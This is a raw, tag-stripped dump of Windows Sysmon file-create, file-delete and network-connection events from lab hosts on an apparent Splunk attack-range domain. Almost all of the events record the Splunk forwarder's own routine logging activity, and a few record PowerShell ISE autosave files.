Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:22.584{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C652509177B72E80E36C29A2850FEE7,SHA256=F440D4A983D86E694B4AAF37BA7DFDAA2D11F8507D6D0D5819F35D28AD97FEB2falsetrue 23542300x800000000000000021219479Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:22.089{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E65EF6172FCEC0FD369722BFA90160EB,SHA256=A1BA33680E06033A4D8BC4241CDE452A679F2374CA5304E9A7EA97C3A254302C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219478Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:22.089{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6410F367B01C8D98D64CCD009F64D3C5,SHA256=F7E0CC5C59002FA8A696B4620548D82A87E78584FDE369EC099AE49E97AE166F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:23.617{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:23.617{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=030DA504C0BED6203D47B67C41D1AEF1,SHA256=2E9A219072EACD7E36487FCF5484687CB108895F4901D01A68D891343AED4D5Ffalsetrue 11241100x800000000000000057345101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:23.601{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:23.601{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF1D26AEF75FA64597E6FC9FCA4CD0C3,SHA256=4A2712A173CE93B83DF7961626C85726ACEA6F0EBB845ADE2F0D8AD760E1E9E9falsetrue 354300x800000000000000021219481Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.463{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64313-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:24.616{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:24.616{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2472382EB26F4E288059D7891EE9E95D,SHA256=7B1D5CC10BF48B0FA01E2BAD88831B4B43A45E1069A0C755F30ECDBEC5B24D06falsetrue 23542300x800000000000000021219482Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:24.058{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC90B56DB5A8250673B2B9F9F4D3075D,SHA256=E359074227506A6F2DF487274933E24886DA1A53EB8DD38D731DC74286F9E921,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:25.631{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:25.631{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1B542CEB8710A34527EADBBABC27E9B,SHA256=9416D506BBD1BD133A712FC67AC0BBF9D803492AD8A59F409C4027C59425752Bfalsetrue 23542300x800000000000000021219483Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:25.073{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DD318A951817184C8F6A93997D334DE,SHA256=E810D96C05D54B14EA449E0FFE5595170CFCAE18BF48B318F506D513B636ABB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:26.646{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:26.646{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57504EF4E72DE5CDED2D8EE2BCD03775,SHA256=B14FEF3D5B6FE2B8A4EBE37494A037F85B952E5A1D822C89ECBED96226F7A35Afalsetrue 23542300x800000000000000021219484Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:26.073{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE6AB80040099F03D360C72D8B3A5D78,SHA256=A903D70E3DB4FB749C6DA1F466D2467A7CEF24FEFCDF845AF04C6892141CEA90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:26.199{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:26.199{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EAA2B1E3288CCD1720278B7CC339487,SHA256=DB8D110024912B4D66ECA88EF3E72A0FF2C3307412D4AE40BCCCF0AE57508C97falsetrue 11241100x800000000000000057345114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:27.661{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:27.661{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7275A4CCE4566918556E9B8138D3C7B4,SHA256=088826D00E1FA23120A263113477CCBEDCAB8B123E69B4463CA20BED136B74F6falsetrue 354300x800000000000000021219488Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:14.509{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64314-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219487Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:27.105{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60C8914A698038717DA8F2423BB10E99,SHA256=C15FC0D36B47994A0A2221D5975F095EC11AC583D38D1F4077EC7B8F93F920A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219486Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:27.105{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E65EF6172FCEC0FD369722BFA90160EB,SHA256=A1BA33680E06033A4D8BC4241CDE452A679F2374CA5304E9A7EA97C3A254302C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219485Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:27.073{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C04BAE9F4EBDDEF448DA26F9F233B95F,SHA256=DBF283F4FE0C4AFA208674829982E75D6A9DF6A17655CB74E6EDCD7AEC5FE480,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:57.530{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54531-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:28.681{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:28.681{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=128E56998422D629983C83E23E9DF7C7,SHA256=D6283967CEA8B44CF664327B9DD1AE513EFC8A05ABC75CE3C28A75EF94BB5BA9falsetrue 23542300x800000000000000021219489Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:28.075{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F0099E20DD59783784DB063E0B5423,SHA256=C68DED39CD134C79FBEA2963AD8804A270029AC2E5169FD9BD67141D93C14224,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:28.582{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:28.582{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA8816A4D24AAC7F04CE0CB6FBBED58A,SHA256=BD77FF8F1DB19A308183A3B65FA08D5A198C9A4C611FA0FE6457D8444D7E02C5falsetrue 11241100x800000000000000057345120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:29.698{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:29.698{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1F6535BC72946FF58489849AC3BC976,SHA256=AE565D3FA89B5555A8BF514B393008AE70B8A7B9151A3BAAA34B10D0E5325F2Bfalsetrue 23542300x800000000000000021219490Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:29.075{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=598C865CDC27351D23DB5742F7D9B1FA,SHA256=0908563C22439FACC5CCF8D997CCCD9BEE8857E142B30F852223FD805266CEE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:30.728{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:30.728{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7320B6595C0194D7C4A1A76330C6F7F2,SHA256=947D53371066E5571C0E93067E8493AE9F9D0AA1346DDC110C7FD4050F48A4A0falsetrue 23542300x800000000000000021219491Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:30.075{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01DF53D4ACA0CC3EEDA3244BAAD5E474,SHA256=922F7E16FE1C6D05F88A07A654480983D8E05A9D99ED6C84598AB07BB41975BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:31.778{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:31.778{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=867176CE468FB6CD7A770D6576E423EF,SHA256=6646B81A0CE9F58A78A768399F2FECAB1F23F08756C7D1727FDC2D3C07393E39falsetrue 23542300x800000000000000021219492Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:31.075{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19DA16A5CECE325B58ED6BC41A1B45C7,SHA256=73AFE7C411BE1DB6DD1E34FA61181384B477C42E5FEC213417DBDE10756D4300,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:32.796{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:32.796{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90027065016B2D4454AC5810B0743233,SHA256=DE974F02EDDEB74AA22D44795FDDFDAEE13ADE8024D62EE9B565EFAA3CA5E250falsetrue 23542300x800000000000000021219495Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:32.263{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E4B36F7032F9E7E37FBEAEBDFE6AEC5,SHA256=50319FE1293AE6B16E03F0137D67E357FE07D27EBEF88E6403D0B91D629285AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219494Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:32.263{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60C8914A698038717DA8F2423BB10E99,SHA256=C15FC0D36B47994A0A2221D5975F095EC11AC583D38D1F4077EC7B8F93F920A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219493Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:32.091{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A485E0FBFEC22A2FCA2ED2113EB77F6,SHA256=1FE9DECBD206C09FCEEBEE126FE6E70F7F8F9BE488191DEB7B4816848B4041ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:32.227{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:32.227{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F124A00EAD0051EB3743433D2EE9EA15,SHA256=327DD68010E68211A22EA81568B751555763E23715B2D56A92851B0725442D8Dfalsetrue 11241100x800000000000000057345131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:33.811{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:33.811{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D85349FD5107FECAEBB61F0FDD9F492,SHA256=20E6BB4BB2E0601783F52A2E8FD88361DC02B7B6E338D3B3A425ADB95BB8EAAEfalsetrue 23542300x800000000000000021219497Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:33.122{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C37D76245DCE058C1B163EF8EC196B3,SHA256=ED8EAA992E601838B15545C3D307B2C109BDBA25310C5ACD81A43CAF2B337583,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:03.564{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54532-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000021219496Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:19.667{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64315-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:34.826{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:34.826{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8150F9E36086080DFA5FFCE728083BDD,SHA256=E6686C09D4CFCBB890D0D277DC2A9E8A2B60B9D06B74132368CEA00A87CB6AD0falsetrue 23542300x800000000000000021219498Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:34.122{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCB3C80294A52C26B946B7497EE7D338,SHA256=72FA2ABCC503042930E03963CD6E480ACFBCEBCFD3C3491B577C5F624D0E6511,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000057345135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:34.179{8B6011A9-E4CD-6172-AAB2-01000000F101}9240ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\9240.xml~RFa3604c82.TMPMD5=456D225B4D65C9CF435A86E0A35A2EE3,SHA256=98A44CE309D109FBE724C41274306C85F0B69B2A3FB9CA4D460D015BE0E930C7falsetrue 11241100x800000000000000057345134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:34.177{8B6011A9-E4CD-6172-AAB2-01000000F101}9240C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\9240.xml~RFa3604c82.TMP2021-11-12 12:16:34.177 254200x800000000000000057345133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 